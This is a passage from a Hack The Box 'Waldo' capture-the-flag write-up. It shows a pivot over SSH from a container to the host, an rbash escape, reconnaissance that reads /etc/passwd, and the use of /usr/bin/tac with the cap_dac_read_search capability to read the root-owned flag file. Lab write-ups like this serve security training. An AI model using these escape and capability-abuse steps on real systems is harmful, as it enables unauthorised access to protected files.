+ nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin
+ waldo:~$ cat /etc/passwd | grep monitor
+ waldo:~$
+
+
+But as you can see, the user monitor is not there, poking around we realise that we are in a container. So this would potentially mean that we are not in the system itself, but just contained within it. So we can assume that we are able to login via ssh as the user monitor into the real system the same way by simply specifying the correct username, which in this case would be "monitor"
+
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → ssh -i pkey monitor@10.10.10.87
+
+
+Which you probably guessed , can't be done remotely, we have to do it from the box itself, hence the Pivoting aspect of this box:
+
+
+ [0] nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → ssh -i pkey nobody@10.10.10.87
+ Welcome to Alpine!
+
+ The Alpine Wiki contains a large amount of how-to guides and general
+ information about administrating Alpine systems.
+ See .
+ waldo:~$ cd .ssh
+ waldo:~/.ssh$ ssh -i .monitor monitor@127.0.0.1
+
+
+
+And only then we are able to really land on the system :
+
+
+ waldo:~/.ssh$ ssh -i .monitor monitor@127.0.0.1
+ The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
+ ECDSA key fingerprint is SHA256:YHb7KyiwRxyN62du1P80KmeA9Ap50jgU6JlRaXThs/M.
+ Are you sure you want to continue connecting (yes/no)? yes
+ Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
+ Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64
+ &.
+ @@@,@@/ %
+ #*/%@@@@/.&@@,
+ @@@#@@#&@#&#&@@@,*%/
+ /@@@&###########@@&*(*
+ (@################%@@@@@. /**
+ @@@@&#############%@@@@@@@@@@@@@@@@@@@@@@@@%((/
+ %@@@@%##########&@@@.... .#%#@@@@@@@#
+ @@&%#########@@@@/ */@@@%(((@@@%
+ @@@#%@@%@@@, *&@@@&%(((#((((@@(
+ /(@@@@@@@ *&@@@@%((((((((((((#@@(
+ %/#@@@/@ @#/@ ..@@@@%(((((((((((#((#@@@@@@@@@@@@&#,
+ %@*(@#%@., /@@@@&(((((((((((((((&@@@@@@&#######%%@@@@# &
+ *@@@@@# .&@@@#(((#(#((((((((#%@@@@@%###&@@@@@@@@@&%##&@@@@@@/
+ /@@ #@@@&#(((((((((((#((@@@@@%%%%@@@@%#########%&@@@@@@@@&
+ *@@ *%@@@@#((((((((((((((#@@@@@@@@@@%####%@@@@@@@@@@@@###&@@@@@@@&
+ %@/ .&%@@%#(((((((((((((((#@@@@@@@&#####%@@@%#############%@@@&%##&@@/
+ @@@@@@%(((((((((((##(((@@@@&%####%@@@%#####&@@@@@@@@@@@@@@@&##&@@@@@@@@@/
+ @@@&(((#((((((((((((#@@@@@&@@@@######@@@###################&@@@&#####%@@*
+ @@#(((((((((((((#@@@@%&@@.,,.*@@@%#####@@@@@@@@@@@@@@@@@@@%####%@@@@@@@@@@
+ *@@%((((((((#@@@@@@@%#&@@,,.,,.&@@@#####################%@@@@@@%######&@@.
+ @@@#(#&@@@@@&##&@@@&#@@/,,,,,,,,@@@&######&@@@@@@@@&&%######%@@@@@@@@@@@
+ @@@@@@&%&@@@%#&@%%@@@@/,,,,,,,,,,/@@@@@@@#/,,.*&@@%&@@@@@@&%#####%@@@@.
+ .@@@###&@@@%%@(,,,%@&,.,,,,,,,,,,,,,.*&@@@@&(,*@&#@%%@@@@@@@@@@@@*
+ @@%##%@@/@@@%/@@@@@@@@@#,,,,.../@@@@@%#%&@@@@(&@&@&@@@@(
+ .@@&##@@,,/@@@@&(. .&@@@&,,,.&@@/ #@@%@@@@@&@@@/
+ *@@@@@&@@.*@@@ %@@@*,&@@ *@@@@@&.#/,@/
+ *@@&*#@@@@@@@& #@( .@@@@@@& ,@@@, @@@@@(,@/@@
+ *@@/@#.#@@@@@/ %@@@, .@@&%@@@ &@& @@*@@*(@@#
+ (@@/@,,@@&@@@ &@@,,(@@& .@@%/@@,@@
+ /@@@*,@@,@@@* @@@,,,,,@@@@. *@@@%,@@**@#
+ %@@.%@&,(@@@@, /&@@@@,,,,,,,%@@@@@@@@@@%,,*@@,#@,
+ ,@@,&@,,,,(@@@@@@@(,,,,,.,,,,,,,,**,,,,,,.*@/,&@
+ &@,*@@.,,,,,..,,,,&@@%/**/@@*,,,,,&(.,,,.@@,,@@
+ /@%,&@/,,,,/@%,,,,,*&@@@@@#.,,,,,.@@@(,,(@@@@@(
+ @@*,@@,,,#@@@&*..,,,,,,,,,,,,/@@@@,*(,,&@/#*
+ *@@@@@(,,@*,%@@@@@@@&&#%@@@@@@@/,,,,,,,@@
+ @@*,,,,,,,,,.*/(//*,..,,,,,,,,,,,&@,
+ @@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@
+ &@&,,,,,,,,,,,,,,,,,,,,,,,,,,,,&@#
+ %@(,,,,,,,,,,,,,,,,,,,,,,,,,,,@@
+ ,@@,,,,,,,,@@@&&&%&@,,,,,..,,@@,
+ *@@,,,,,,,.,****,..,,,,,,,,&@@
+ (@(,,,.,,,,,,,,,,,,,,.,,,/@@
+ .@@,,,,,,,,,,,,,...,,,,,,@@
+ ,@@@,,,,,,,,,,,,,,,,.(@@@
+ %@@@@&(,,,,*(#&@@@@@@,
+
+ Here's Waldo, where's root?
+ Last login: Tue Jul 24 08:09:03 2018 from 127.0.0.1
+ -rbash: alias: command not found
+ monitor@waldo:~$ uname -a
+ -rbash: uname: command not found
+
+
+ From there we are in a restricted bash (rbash) but we can evade it by specifying the correct flags when we connect via ssh as the monitor user.
+
+ waldo:~/.ssh$ ssh -i .monitor monitor@127.0.0.1 -t bash --noprofile
+
+ monitor@waldo:~$ ls
+ app-dev bin
+
+ monitor@waldo:~$ uname -a
+ bash: uname: command not found
+
+ monitor@waldo:~$ echo $PATH
+ /home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1
+
+ As you can see, we need to manually set our $PATH variable, so let's make sure we can execute binaries from /bin /sbin /usr/bin and so on.
+
+ monitor@waldo:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
+ monitor@waldo:~$ uname -a
+ Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64 GNU/Linux
+
+ Now we have access to the binaries we need, and we can continue to poke around the box , we take a look into monitor/app-dev
+
+ monitor@waldo:~$ cd app-dev
+ monitor@waldo:~/app-dev$ pwd
+ /home/monitor/app-dev
+ monitor@waldo:~/app-dev$ ls
+ logMonitor logMonitor.bak logMonitor.c logMonitor.h logMonitor.h.gch logMonitor.o makefile v0.1
+
+ In here we have access to the sourcecode of an application written in C, although the interesting part is in the v0.1 folder :
+
+ monitor@waldo:~/app-dev$ cd v0.1
+ monitor@waldo:~/app-dev/v0.1$ ls -lash
+ total 24K
+ 4.0K drwxr-x--- 2 app-dev monitor 4.0K May 3 2018 .
+ 4.0K drwxrwx--- 3 app-dev monitor 4.0K May 3 2018 ..
+ 16K -r-xr-x--- 1 app-dev monitor 14K May 3 2018 logMonitor-0.1
+ monitor@waldo:~/app-dev/v0.1$ ./logMonitor-0.1 -a
+ Mar 20 06:17:01 waldo CRON[929]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 06:17:01 waldo CRON[929]: pam_unix(cron:session): session closed for user root
+ Mar 20 06:25:01 waldo CRON[934]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 06:25:01 waldo CRON[934]: pam_unix(cron:session): session closed for user root
+ Mar 20 07:17:01 waldo CRON[1018]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 07:17:01 waldo CRON[1018]: pam_unix(cron:session): session closed for user root
+ Mar 20 07:30:01 waldo CRON[1023]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 07:30:01 waldo CRON[1023]: pam_unix(cron:session): session closed for user root
+ Mar 20 08:17:01 waldo CRON[1047]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 08:17:01 waldo CRON[1047]: pam_unix(cron:session): session closed for user root
+ Mar 20 09:17:01 waldo CRON[1064]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 09:17:01 waldo CRON[1064]: pam_unix(cron:session): session closed for user root
+ Mar 20 10:17:01 waldo CRON[1095]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 10:17:01 waldo CRON[1095]: pam_unix(cron:session): session closed for user root
+ Mar 20 10:27:59 waldo sshd[1112]: Accepted publickey for monitor from 127.0.0.1 port 55516 ssh2: RSA SHA256:Kl+zDjbDx4fQ7xVvGg6V3RhjezqB1gfe2kWqm1AMD0c
+ Mar 20 10:27:59 waldo sshd[1112]: pam_unix(sshd:session): session opened for user monitor by (uid=0)
+ Mar 20 10:27:59 waldo systemd: pam_unix(systemd-user:session): session opened for user monitor by (uid=0)
+ Mar 20 10:27:59 waldo systemd-logind[356]: New session 8 of user monitor.
+ Mar 20 10:30:45 waldo sshd[1121]: Received disconnect from 127.0.0.1 port 55516:11: disconnected by user
+ Mar 20 10:30:45 waldo sshd[1121]: Disconnected from 127.0.0.1 port 55516
+ Mar 20 10:30:45 waldo sshd[1112]: pam_unix(sshd:session): session closed for user monitor
+ Mar 20 10:30:45 waldo systemd-logind[356]: Removed session 8.
+ Mar 20 10:31:01 waldo sshd[1148]: Accepted publickey for monitor from 127.0.0.1 port 55518 ssh2: RSA SHA256:Kl+zDjbDx4fQ7xVvGg6V3RhjezqB1gfe2kWqm1AMD0c
+ Mar 20 10:31:01 waldo sshd[1148]: pam_unix(sshd:session): session opened for user monitor by (uid=0)
+ Mar 20 10:31:01 waldo systemd: pam_unix(systemd-user:session): session opened for user monitor by (uid=0)
+ Mar 20 10:31:01 waldo systemd-logind[356]: New session 10 of user monitor.
+
+ It looks like the application is able to read log files even though it doesn't have the SUID bit set which is abit odd since
+ the other logMonitor-0.1 binary was owned by the same user :
+
+ monitor@waldo:~/app-dev/v0.1$ ls -lash logMonitor-0.1 && ls -lash ../logMonitor
+ 16K -r-xr-x--- 1 app-dev monitor 14K May 3 2018 logMonitor-0.1
+ 16K -rwxrwx--- 1 app-dev monitor 14K Jul 24 2018 ../logMonitor
+
+ Both are owned by the same user, and the previous logMonitor binary even has more permissions than this one which is odd,
+ this is because there is something called "file capabilities" which we can check by using the command getcap :
+
+ monitor@waldo:~/app-dev/v0.1$ getcap -r logMonitor-0.1
+ logMonitor-0.1 = cap_dac_read_search+ei
+
+ This logMonitor-0.1 file has the cap_dac_read_search capability which allows it to bypass the read permission checks
+ and directory all three RWX checks, which is quite handy, but we can't use this file to read anything other than
+ the log files:
+
+ monitor@waldo:~/app-dev/v0.1$ getcap -r /* 2>/dev/null
+ /home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei
+ /usr/bin/tac = cap_dac_read_search+ei
+
+ So that's weird, apparently this can be used to read /usr/bin/tac so let's investigate it :
+
+ monitor@waldo:~/app-dev/v0.1$ file /usr/bin/tac
+ /usr/bin/tac: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1c24dbf3a64cb509bf8bde1aa4ecf04fca8959ae, stripped
+ monitor@waldo:~/app-dev/v0.1$ /usr/bin/tac
+ ^C
+ monitor@waldo:~/app-dev/v0.1$ /usr/bin/tac --help
+ Usage: /usr/bin/tac [OPTION]... [FILE]...
+ Write each FILE to standard output, last line first.
+
+ With no FILE, or when FILE is -, read standard input.
+
+ Mandatory arguments to long options are mandatory for short options too.
+ -b, --before attach the separator before instead of after
+ -r, --regex interpret the separator as a regular expression
+ -s, --separator=STRING use STRING as the separator instead of newline
+ --help display this help and exit
+ --version output version information and exit
+
+ GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
+ Full documentation at: <http://www.gnu.org/software/coreutils/tac>
+ or available locally via: info '(coreutils) tac invocation'
+
+ Interesting binary, since we can use it to write each FILE to stdout, and as we saw earlier, /usr/bin/tac has the cap_dac_read_search capabilities which
+ allows it to bypass the RWX permission checks, so let's see if we can use it to read the root flag :
+
+ monitor@waldo:~/app-dev/v0.1$ /usr/bin/tac /root/root.txt
+ 8fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ And that's it ! We have been able to print out the root flag.
+
+
+
+
+
+
+
+
+
+
Conclusion
+
Here we can see the progress graph :
+
+
+
+
+
+
+
+
+
Nihilism
+
+ Until there is Nothing left.
Creative Commons Zero: No Rights Reserved
+
+
+
+
+
+
+
+
About nihilist
+
Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8
+
+
+
+
+
+
+